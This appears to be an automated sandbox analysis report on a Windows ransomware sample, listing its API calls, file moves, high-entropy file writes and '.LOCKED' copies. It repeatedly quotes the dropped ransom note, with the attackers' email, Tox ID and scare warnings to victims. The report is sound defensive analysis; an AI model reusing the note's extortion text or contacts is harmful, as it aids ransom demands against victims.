Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CC728 SendMessageW,SendMessageW,SendMessageW,DefWindowProcW,SendMessageW,SendMessageW,SendMessageW,DestroyWindow,CreateThread,SHEmptyRecycleBinW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DestroyWindow,MoveWindow,MoveWindow,MoveWindow,MoveWindow,MoveWindow,SendMessageW,SendMessageW,SendMessageW,UnregisterHotKey,UnregisterHotKey,UnregisterHotKey,UnregisterHotKey,KillTimer,DeleteObject,UnregisterClassW,DeleteCriticalSection,PostQuitMessage,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,EnterCriticalSection,LeaveCriticalSection,__aulldiv,__aulldvrm,SendMessageW,SendMessageW,SendMessageW,SendMessageW,lstrcmpiW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,SendMessageW,ShowWindow,PostMessageW,DragQueryFileW,DragQueryFileW,DragQueryFileW,0_2_005CC728

Spam, unwanted Advertisements and Ransom Demands

barindex
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\win_gui.exe.exeFile moved: C:\Users\user\Desktop\DUUDTUBZFW.xlsxJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile moved: C:\Users\user\Desktop\GRXZDKKVDB.pdfJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile moved: C:\Users\user\Desktop\KLIZUSIQEN.mp3Jump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile moved: C:\Users\user\Desktop\EIVQSAOTAQ.pdfJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile moved: C:\Users\user\Desktop\HMPPSXQPQV.mp3Jump to behavior
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ar-ae\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile dropped: C:\README.TXT -> decrypt it by yourself! the only method of recovering files is to purchase an unique private key.only we can give you this key and only we can recover your files.to be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free.but this file should be of not valuable!do you really want to restore your files?write to email: buybackme@mail2tor.comtox: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7ahow to use tox: 1. download a utox client: http://utox.org 2. run it 3. add our tox id: 140b031c8626b9ca006aba41ebd8d092fe8d0fa71279cd0d42aa63adacf60609171047565c7aattention! * do not rename encrypted files. * do not try to decrypt your data using third party software, it may cause permanent data loss. * decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * we have been in your network for a long Jump to dropped file
Writes many files with high entropy
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\zip.dll entropy: 7.99739131676Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\wsdetect.dll entropy: 7.99912356094Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\WindowsAccessBridge-32.dll entropy: 7.99877932026Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\lib\classlist entropy: 7.9976421456Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\StructureConstants.au3 entropy: 7.99737452337Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar entropy: 7.99874378449Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\Visa.au3 entropy: 7.99517680179Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\UIAWrappers.au3 entropy: 7.99857739081Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIDlg.au3 entropy: 7.99462540804Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIDiag.au3 entropy: 7.99481562808Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIConv.au3 entropy: 7.99448116193Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\lib\jfxswt.jar entropy: 7.9945329385Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIFiles.au3 entropy: 7.99794459845Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIGdiInternals.au3 entropy: 7.99358329738Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIGdiDC.au3 entropy: 7.99074144487Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIGdi.au3 entropy: 7.99895338604Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIInternals.au3 entropy: 7.99099778931Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIIcons.au3 entropy: 7.99270889863Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIMem.au3 entropy: 7.99020650329Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPILocale.au3 entropy: 7.99074604893Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIShellEx.au3 entropy: 7.99622405248Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIRes.au3 entropy: 7.99555110701Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIReg.au3 entropy: 7.9949211272Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIProc.au3 entropy: 7.99764388598Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-private-l1-1-0.dll entropy: 7.99708036048Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\hi.txt entropy: 7.99037768821Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\bci.dll entropy: 7.99180664129Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\dcpr.dll entropy: 7.99900005438Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\dt_shmem.dll entropy: 7.99386074145Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\decora_sse.dll entropy: 7.99729730135Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\dt_socket.dll entropy: 7.99346543352Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt entropy: 7.99045771948Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\eula.dll entropy: 7.99871234052Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\fontmanager.dll entropy: 7.99929248295Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\glass.dll entropy: 7.99912284447Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\fxplugins.dll entropy: 7.99880228439Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\j2pcsc.dll entropy: 7.99221480825Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\instrument.dll entropy: 7.99900760664Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\j2gss.dll entropy: 7.99565348821Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\hprof.dll entropy: 7.99869626992Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\j2pkcs11.dll entropy: 7.99688769708Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jaas_nt.dll entropy: 7.9924626937Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Java\jre-1.8\lib\tzdb.dat entropy: 7.99835031009Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPISys.au3 entropy: 7.99775610723Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPIShPath.au3 entropy: 7.99567981423Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPITheme.au3 entropy: 7.99557374793Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPISysWin.au3 entropy: 7.99711305012Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinAPISysInternals.au3 entropy: 7.99313686346Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WinNet.au3 entropy: 7.99575948442Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\WindowsConstants.au3 entropy: 7.99434217727Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Include\word.au3 entropy: 7.9952342039Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dll entropy: 7.99596249206Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm entropy: 7.99902154825Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.psd1 entropy: 7.99422765749Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Office Theme.thmx entropy: 7.99945997682Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties entropy: 7.99795140846Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Office 2013 - 2022 Theme.thmx entropy: 7.99945897134Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml entropy: 7.99610253036Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll entropy: 7.99614236576Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_DLL.lib entropy: 7.99452665139Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64_DLL.lib entropy: 7.99372272189Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\MSECache\OfficeKMS\kms_host.vbs entropy: 7.99647172437Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt entropy: 7.99159934858Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\sa.txt entropy: 7.99078840226Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip.dll entropy: 7.99834054125Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip.chm entropy: 7.99837321083Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip32.dll entropy: 7.9977160786Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7z.sfx entropy: 7.9991614987Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7zCon.sfx entropy: 7.99903813816Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\History.txt entropy: 7.9968065076Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe entropy: 7.99929791332Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe entropy: 7.99803192935Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exe entropy: 7.99914277617Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exe entropy: 7.99880834129Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe entropy: 7.99910665943Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exe entropy: 7.99739704231Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe entropy: 7.99858582028Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt.chm entropy: 7.99570884073Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.Access.Access.x-none.msi.16.x-none.xml entropy: 7.99732644656Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.accessmui.msi.16.en-us.xml entropy: 7.99702663106Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml entropy: 7.99519123261Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml entropy: 7.99884632869Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.lyncmui.msi.16.en-us.xml entropy: 7.99314755573Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml entropy: 7.99803539621Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.office64ww.msi.16.x-none.xml entropy: 7.99927748311Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml entropy: 7.99805758117Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml entropy: 7.9985960587Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vregwow6432\office64mui.msi.16.en-us.vreg.dat entropy: 7.99369054916Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vregwow6432\onenote.x-none.msi.16.x-none.vreg.dat entropy: 7.99936782695Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vregwow6432\onenotemui.msi.16.en-us.vreg.dat entropy: 7.99399556194Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip32.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9977160786Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99837321083Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7zCon.sfx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99903813816Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7-zip.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99834054125Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\7z.sfx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9991614987Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\History.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9968065076Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\Uninstall.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99803192935Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Au3Info.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99880834129Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\mozilla maintenance service\maintenanceservice.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99929791332Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Au3Info_x64.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99910665943Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Au3Check.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99914277617Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Uninstall.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99739704231Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoIt3Help.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99858582028Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoIt.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99570884073Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\7-Zip\Lang\hi.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99037768821Jump to dropped file
